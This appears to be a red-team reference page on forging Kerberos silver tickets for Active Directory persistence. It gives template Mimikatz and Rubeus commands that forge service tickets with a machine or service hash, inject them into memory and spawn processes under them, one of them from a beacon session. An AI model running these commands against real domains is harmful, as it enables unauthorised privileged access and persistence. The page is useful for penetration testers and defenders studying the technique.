A silver ticket is a service ticket modified to give privileges to the attacker. It requires the knowledge of the service password (See Kerberoasting); for the purposes of host persisitence, the service will be CIFS/SMB, whose principal is the machine account. For more examples on how to use a silver ticket, see Kerberos Attack: Silver Ticket Edition.
Requirements
- Needs the security identifier of the domain
- Needs a service password or password hash
Target SPN for persistence method
- psexec: HOST or CIFS
- winrm: HOST or HTTP
- dcsync (DC only): LDAP
Mimikatz
To create a silver ticket via Mimikatz (ironic that the command is called golden):
kerberos::golden /user:ANY_DOMAIN_USER /domain:AD_DOMAIN /sid:DOMAIN_SID /target:TARGET_SPN_DOMAIN /service:TARGET_SPN_PROTOCOL /rc4:SERVICE_NTLM_HASH /ptt- DOMAIN_SID is the SID of the domain
whoami /userto get current domain user’s SID- then remove the last 5 character (
-nnnnwhere n is a number)
/rc4: encrypt the service ticket using RC4 and service NTLM password hash/ptt: inject ticket into memory
This will create a ticket that mimics a local administrator (RID 500) in the server with several high-privileged group memberships.
Rubeus
To create a silver ticket via Rubeus:
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:[target-spn]/[target-host-fqdn] /aes256:[machine-hash-aes256] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrapTo use a silver ticket:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-b64]